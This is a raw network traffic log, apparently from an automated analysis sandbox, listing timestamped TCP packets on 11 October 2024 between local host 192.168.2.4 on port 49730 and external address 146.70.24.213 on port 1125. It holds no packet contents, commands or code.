Oct 11, 2024 16:53:46.752376080 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.753904104 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.753936052 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.753968000 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.754002094 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.754053116 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.754053116 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.754072905 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.754106045 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.754183054 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.754187107 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.754220963 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.754254103 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.754293919 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.754303932 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.754339933 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.754362106 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.754411936 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.754446030 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.754477978 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.754504919 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.754528046 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.754558086 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.754563093 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.754607916 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.754641056 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.754688025 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.754688978 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.754688978 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.754736900 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.754767895 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.754795074 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.754801035 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.754833937 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.754862070 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.754868984 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.754901886 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.754935026 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.754939079 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.754983902 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.754996061 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.755018950 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.755050898 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.755084038 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.755115032 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.755131960 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.755131960 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.755146980 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.755178928 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.755211115 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.755227089 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.755244017 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.755266905 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.755276918 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.755309105 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.755331993 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.755342007 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.755378008 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.755400896 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.755486965 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.755536079 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.755588055 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.755619049 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.755637884 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.755637884 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.755670071 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.755717993 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.755752087 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.755759001 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.755783081 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.755815983 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.755846977 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.755866051 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.755866051 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.755880117 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.755928040 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.755961895 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.755994081 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.756014109 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.756014109 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.756027937 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.756059885 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.756093025 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.756124973 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.756141901 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.756141901 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.756160021 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.756191969 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.756226063 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.756258965 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.756278992 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.756278992 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.756292105 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.756326914 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.756360054 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.756366968 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.756411076 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.756438971 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.756444931 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.756535053 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.756578922 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.756587029 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.756618977 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.756652117 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.756683111 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.756700993 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.756700993 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.756716013 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.756869078 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.756942987 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.756992102 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.757025957 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.757045031 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.757076979 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.757107973 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.757139921 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.757173061 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.757189989 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.757189989 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.757991076 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.758100986 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.758132935 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.758164883 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.758174896 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.758208990 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.758243084 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.758258104 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.758258104 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.758275032 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.758380890 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.876621962 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.876679897 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.876724005 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.876729012 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.876770020 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.876804113 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.876821041 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.876840115 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.876878023 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.876890898 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.876924038 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.876955986 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.876965046 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.876996040 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.877034903 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.877043009 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.877094030 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.877135038 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.877141953 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.877173901 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.877204895 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.877213955 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.877239943 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.877279997 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.877332926 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.877367020 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.877398014 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.877404928 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.877430916 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.877473116 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.877476931 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.877510071 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.877541065 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.877551079 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.877573967 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.877604961 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.877613068 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.877639055 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.877671003 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.877679110 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.877703905 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.877737999 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.877747059 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.880193949 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.880249023 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.880264044 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.880300999 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.880347967 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.880352974 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.880382061 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.880414963 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.880428076 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.880446911 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.880495071 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.880500078 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.880573988 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.880605936 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.880620956 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.880640030 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.880671978 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.880686998 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.880707026 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.880753994 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.880757093 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.880805969 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.880834103 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.880851030 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.880867004 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.880903959 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.880913019 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.880953074 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.880986929 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.881000996 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.881020069 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.881052971 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.881066084 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.881084919 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.881117105 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.881129980 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.881150007 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.881195068 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.881198883 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.881247044 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.881289005 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.881295919 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.881328106 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.881361008 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.881392002 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.881395102 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.881428003 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.881443024 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.881459951 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.881505013 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.881513119 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.881539106 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.881577015 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.881583929 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.881674051 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.881724119 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.881731987 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.881763935 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.881805897 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.881813049 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.881844044 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.881875992 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.881891012 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.881923914 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.881954908 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.881968975 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.882004976 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.882040977 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.882050991 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.882082939 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.882114887 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.882116079 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.882148981 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.882153988 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.882191896 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.882225037 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.882239103 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.882256985 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.882291079 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.882317066 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.882323027 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.882355928 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.882369041 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.882388115 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.882420063 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.882433891 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.882452011 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.882484913 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.882497072 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.882517099 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.882549047 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.882564068 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.882582903 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.882616997 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.882626057 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.882651091 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.882702112 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.882735014 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.882786036 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.882818937 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.882833004 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.882854939 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.882872105 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.882888079 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.882898092 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.882925987 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.883378983 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.883429050 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.883481026 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.883487940 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.883519888 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.883553028 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.883565903 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.883584023 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.883618116 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.883631945 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.884742975 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.884784937 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.884793997 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.884891987 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.884924889 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.884957075 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.884963989 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.884989977 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.884999990 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.885023117 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.885067940 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.985606909 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.985658884 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.985694885 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.985780954 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.985814095 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.985847950 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.985871077 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.985871077 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.985883951 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.985892057 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.985922098 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.985954046 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.985965967 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.985987902 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.986048937 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.986083984 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.986115932 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.986165047 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.986232996 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.986291885 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.986339092 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.986344099 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.986396074 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.986428976 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:46.986439943 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:46.986479044 CEST	1125	49730	146.70.24.213	192.168.2.4
